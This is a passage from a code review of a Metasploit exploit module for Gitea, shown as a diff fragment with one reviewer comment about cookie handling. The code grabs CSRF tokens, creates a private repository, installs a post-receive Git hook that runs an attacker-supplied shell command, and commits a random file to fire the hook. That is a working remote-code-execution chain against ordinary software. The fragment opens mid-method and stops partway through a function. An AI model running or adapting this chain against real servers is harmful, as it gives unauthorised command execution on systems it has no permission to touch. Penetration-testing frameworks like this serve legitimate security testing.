modules/exploits/multi/http/gitea_git_hooks_rce.rb

```diff
@@ -0,0 +1,387 @@
+    end
+
+    nil
+  end
+
+  def gitea_create_repo
+    uri = normalize_uri(datastore['TARGETURI'], '/repo/create')
+
+    res = send_request_cgi('method' => 'GET', 'uri' => uri)
+    unless res
+      fail_with(Failure::Unreachable, "Unable to reach #{uri}")
+    end
+
+    vprint_status('Get "csrf" and "uid" values')
+    csrf = extract_value(res, '_csrf')
+    vprint_good("csrf=#{csrf}")
+    uid = extract_value(res, 'uid')
+    vprint_good("uid=#{uid}")
+
+    res = http_post_request(
+      uri,
+      uid: uid,
+      repo_name: @repo_name,
+      private: 'on',
+      description: '',
+      repo_template: '',
+      issue_labels: '',
+      gitignores: '',
+      license: '',
+      readme: 'Default',
+      auto_init: 'on',
+      default_branch: 'master',
+      csrf: csrf
+    )
+    unless res
+      fail_with(Failure::Unreachable, "Unable to reach #{uri}")
+    end
+
+    unless res.code == 302
+      fail_with(Failure::UnexpectedReply, 'Create repository failure')
+    end
+
+    nil
+  end
+
+  def gitea_post_receive_hook(cmd)
+    uri = normalize_uri(datastore['USERNAME'], @repo_name, '/settings/hooks/git/post-receive')
+    shell = <<~SHELL
+      #!/bin/bash
+      #{cmd}&
+      exit 0
+    SHELL
+
+    res = http_post_request(uri, content: shell)
+    unless res
+      fail_with(Failure::Unreachable, "Unable to reach #{uri}")
+    end
+
+    unless res.code == 302
+      msg = 'Post-receive hook creation failure'
+      if res.code == 404
+        msg << ' (user is probably not allowed to create Git Hooks)'
+      end
+      fail_with(Failure::UnexpectedReply, msg)
+    end
+
+    nil
+  end
+
+  def gitea_create_file(last_chunk: false)
+    uri = normalize_uri(datastore['USERNAME'], @repo_name, '/_new/master')
+    filename = "#{Rex::Text.rand_text_alpha(4..8)}.txt"
+
+    res = send_request_cgi('method' => 'GET', 'uri' => uri)
+    unless res
+      fail_with(Failure::Unreachable, "Unable to reach #{uri}")
+    end
+
+    vprint_status('Get "csrf" and "last_commit" values')
+    csrf = extract_value(res, '_csrf')
+    vprint_good("csrf=#{csrf}")
+    last_commit = extract_value(res, 'last_commit')
+    vprint_good("last_commit=#{last_commit}")
+
+    http_post_request(
+      uri,
+      last_commit: last_commit,
+      tree_path: filename,
+      content: Rex::Text.rand_text_alpha(1..20),
+      commit_summary: '',
+      commit_message: '',
+      commit_choice: 'direct',
+      csrf: csrf,
+      timeout: last_chunk ? 0 : 20 # The last one never returns, don't bother waiting
+    )
+    vprint_status("#{filename} created")
+
+    nil
+  end
+
+  # Hook the HTTP client method to add specific cookie management logic
+  def send_request_cgi(opts, timeout = 20)
+    res = super
+
+    return unless res
+
+    # HTTP client does not handle cookies with the same name correctly. It adds
+    # them instead of substituing the old value with the new one.
+    unless res.get_cookies.empty?
```

Comment:
cc @agalway-r7 - might be worth checking that `keep_cookies` would've worked with this under https://github.com/rapid7/metasploit-framework/pull/14831